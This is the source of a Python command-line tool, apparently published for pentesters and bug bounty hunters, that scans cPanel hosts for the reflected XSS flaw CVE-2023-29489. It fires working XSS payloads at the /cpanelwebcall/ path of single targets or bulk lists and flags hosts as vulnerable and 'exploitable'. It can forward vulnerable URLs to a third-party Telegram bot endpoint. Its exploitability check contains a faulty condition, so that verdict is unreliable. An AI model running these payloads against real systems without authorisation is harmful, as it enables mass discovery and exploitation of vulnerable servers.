#!/usr/bin/env python3

"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""
class Data:
    
    api = 'https://api.cappriciosec.com/Telegram/cappriciosecbot.php'
    config_path = '~/.config/cappriciosec-tools/cappriciosec.yaml'
    bugname = 'R-XSS'

class Colors:
    RED = '\x1b[31;1m'
    BLUE = '\x1b[34;1m'
    GREEN = '\x1b[32;1m'
    RESET = '\x1b[0m'
    MAGENTA = '\x1b[35;1m'



#!/usr/bin/env python3


"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""
import click 
from .utils import helpers
from .includes import scan
from .includes import filereader
from .utils import configure
from .utils import const
import webbrowser
import os


def helpbanner(ctx, params, value):
    if value:
        helpers.display_help()
        ctx.exit()


@click.command(context_settings=dict(help_option_names=['-h', '--help']))
@click.option('-u', '--url', type=str, help="URL to scan")
@click.option('-i', '--input', type=str, help="lost of input file")
@click.option('-o', '--output', type=str, help="output in text file")
@click.option('-c', '--chatid', type=str, help='Creating Telegram Notification')
@click.option('-h', '--help', 'helpbanner', is_flag=True, expose_value=False, is_eager=True, callback=helpbanner, help="help menu")

def main(url, input, output, chatid):
    if url:
       helpers.banner()
       scan.cvescan(url,output)

    if input:
       helpers.banner()
       filereader.reader(input,output)
    
    if chatid:
        helpers.banner()
        configure.new_chatid(chatid)
    
    
    
if __name__ == "__main__":
    yaml_file_path = os.path.expanduser(const.Data.config_path)
    folder_path = os.path.dirname(yaml_file_path)
    os.makedirs(folder_path, exist_ok=True)
    print(configure.check_id())
    main()



#!/usr/bin/env python3


"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""
import sys
import os
sys.path.append(os.path.join(os.path.expanduser("~"), ".local/lib/python3.11/site-packages/cpanel_xss_2023/"))
import requests
from urllib3.exceptions import InsecureRequestWarning
from urllib.parse import quote,urlparse
from . import writefile
from utils import const
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from utils import const
from utils import configure
from . import bot


endpoint = "/cpanelwebcall/<img src=x onerror=\"prompt('hacked')\">aaa"
xss = "<img src=x onerror=\"prompt('hacked')\">aaa"


def cvescan(url, output):
    try:
        with requests.Session() as session:
            
        
            encode = quote(endpoint)
            fullurl = f'{url}/{encode}'
            
            try:
                response = requests.get(fullurl)
                print(f'testing ===> {fullurl}')
                if (response.status_code == 400) and (xss in response.text):
                    outputprint = (
                                f"\n{const.Colors.RED}💸[Vulnerable]{const.Colors.RESET} ======> "
                                f"{const.Colors.BLUE}{url}{const.Colors.RESET} \n"
                                f"{const.Colors.MAGENTA}📸PoC-Url->{const.Colors.BLUE}${const.Colors.RESET} {fullurl}\n\n\n"
                            )
                    
                    print(outputprint)
                    exploit = "/cpanelwebcall/%3Cimg"+"%20"+"src=x"+"%20"+"onerror="+"%22"+"document.location="+"%27"+"https://google.com"+"%27%22%3E"
                    
                    url_exploit = f'{url}/{exploit}'
                    
                    response_exploit = requests.get(url_exploit)
                    
                    if not(response_exploit.status_code > 300) or (response_exploit.status_code < 400): 
                        print(f"\n{const.Colors.RED}⚠️ OOPS! XSS Exploitable {const.Colors.RESET}")
                        print(f"{const.Colors.MAGENTA}📸PoC-Url->{const.Colors.BLUE}${const.Colors.RESET} {url}/{exploit}")
                    else:
                        print(f"\n{const.Colors.GREEN}😌 Not Exploitable{const.Colors.RESET}")
                    if configure.check_id() == "Exist":
                        bot.sendmessage(fullurl)
                    if output is not None:
                        writefile.writedata(
                            output, str(f'{fullurl}\n'))
                        

                
            except requests.exceptions.RequestException as e:
                print(
                    f'{const.Colors.MAGENTA}Invalid Domain ->{const.Colors.BLUE}${const.Colors.RESET} {fullurl}: {e}')
    except requests.exceptions.RequestException as e:
        print(f"Check Network Connection: {e}")






#!/usr/bin/env python3

"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""
def writedata(output,data):
    with open(output,'a') as file:
        file.write(data)


#!/usr/bin/env python3

"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""
import getpass
username = getpass.getuser()


def display_help():
    help_banner = f"""
    
👋 Hey \033[96m{username}
   \033[92m                                                             v1.1
   ___ ___               _  __  _____ ___   ___ __ ___ ____
  / __| _ \__ _ _ _  ___| | \ \/ / __/ __| |_  )  \_  )__ /
 | (__|  _/ _` | ' \/ -_) |  >  <\__ \__ \  / / () / / |_ \\
  \___|_| \__,_|_||_\___|_| /_/\_\___/___/ /___\__/___|___/
                                                               

                                   \033[0mDeveloped By \x1b[31;1m\033[4m@mdaseem03\033[0m


\x1b[31;1mCVE-2023-29489 : Bug scanner for WebPentesters and Bugbounty Hunters 

\x1b[31;1m$ \033[92mcpanel_xss_2023\033[0m [option]

Usage: \033[92mcpanel_xss_2023\033[0m [options]

Options:
  -u, --url     URL to scan                                CVE-2021-20323 -u https://target.com                
  -i, --input   <filename> Read input from txt             CVE-2021-20323 -i target.txt                         
  -o, --output  <filename> Write output in txt file        CVE-2021-20323 -i target.txt -o output.txt     
  -c, --chatid  Creating Telegram Notification             CVE-2021-20323 --chatid yourid    
  -h, --help    Help Menu                       
    """
    print(help_banner)


def banner():
    help_banner = f"""
    \033[94m
👋 Hey \033[96m{username}
   \033[92m                                                             v1.1
   ___ ___               _  __  _____ ___   ___ __ ___ ____
  / __| _ \__ _ _ _  ___| | \ \/ / __/ __| |_  )  \_  )__ /
 | (__|  _/ _` | ' \/ -_) |  >  <\__ \__ \  / / () / / |_ \\
  \___|_| \__,_|_||_\___|_| /_/\_\___/___/ /___\__/___|___/
                                                               

                                   \033[0mDeveloped By \x1b[31;1m\033[4m@mdaseem03\033[0m


\x1b[31;1mCVE-2023-29489 scanner for WebPentesters and Bugbounty Hunters 

\033[0m"""
    print(help_banner)



"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""
from .main import main


#!/usr/bin/env python3


"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""

from . import scan

def reader(input,output):
    try:
        with open(input,'r') as file:
            for line in file:
                scan.cvescan(line.strip(), output)
    except FileNotFoundError:
        print("File not found. Check the file path and name.")

    


#!/usr/bin/env python3

"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""
import os
import yaml
from utils import const


def new_chatid(chatid):
    yaml_file_path = os.path.expanduser(
       const.Data.config_path)
    folder_path = os.path.dirname(yaml_file_path)
    os.makedirs(folder_path, exist_ok=True)

    if not os.path.exists(yaml_file_path):
        initial_content = {"config": {"chatid": chatid}}

        with open(yaml_file_path, "w") as file:
            yaml.dump(initial_content, file, default_flow_style=False)

        print(f"Config file created at: {yaml_file_path}")

    else:
        with open(yaml_file_path, "r") as file:
            data = yaml.safe_load(file)

        if "config" in data and "chatid" in data["config"]:
            print(f"chatid is already present: {data['config']['chatid']}")

        else:
            data.setdefault("config", {})
            data["config"]["chatid"] = chatid

            with open(yaml_file_path, "w") as file:
                yaml.dump(data, file, default_flow_style=False)

            print(f"chatid appended to YAML file: {yaml_file_path}")


def check_id():
    yaml_file_path = os.path.expanduser(const.Data.config_path)
    try:
        with open(yaml_file_path, "r") as file:
            data = yaml.safe_load(file)

        if "config" in data and "chatid" in data["config"]:
            return "Exist"

        else:
            return "Null"

    except:
        print()
    

def get_chatid():
    yaml_file_path = os.path.expanduser(const.Data.config_path)
    try:
        with open(yaml_file_path, "r") as file:
            data = yaml.safe_load(file)

        if "config" in data and "chatid" in data["config"]:
            chatid = data['config']['chatid']
            return chatid

        else:
            return "Null"

    except:
        print()



#!/usr/bin/env python3


"""
 * cpanel_xss_2023
 * CVE-2023-29489 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * Developed By mdaseem03 
 * Intern
 * Cappricio Securities <https://cappriciosec.com>
 */
 
"""
import requests
from utils import const
from utils import configure

def sendmessage(vul):

    data = {"Tname": "cpanel_xss_2023", "chatid": configure.get_chatid(), "data": vul,
            "bugname": const.Data.bugname, "Priority": "Medium"}

    headers = {
        "Content-Type": "application/json",
    }
    try:
        response = requests.put(const.Data.api, json=data, headers=headers)
    except:
        print("Bot Error")



from setuptools import setup, find_packages

with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setup(
    name='cpanel_xss_2023',
    version='1.1',
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/mdaseem03/cpanel_xss_2023",
    packages=find_packages(),
    install_requires=[
        'click',
        'requests',
        'PyYAML',
    ],
    entry_points={
        'console_scripts': [
            'cpanel_xss_2023=cpanel_xss_2023.main:main',
        ],
    },
)

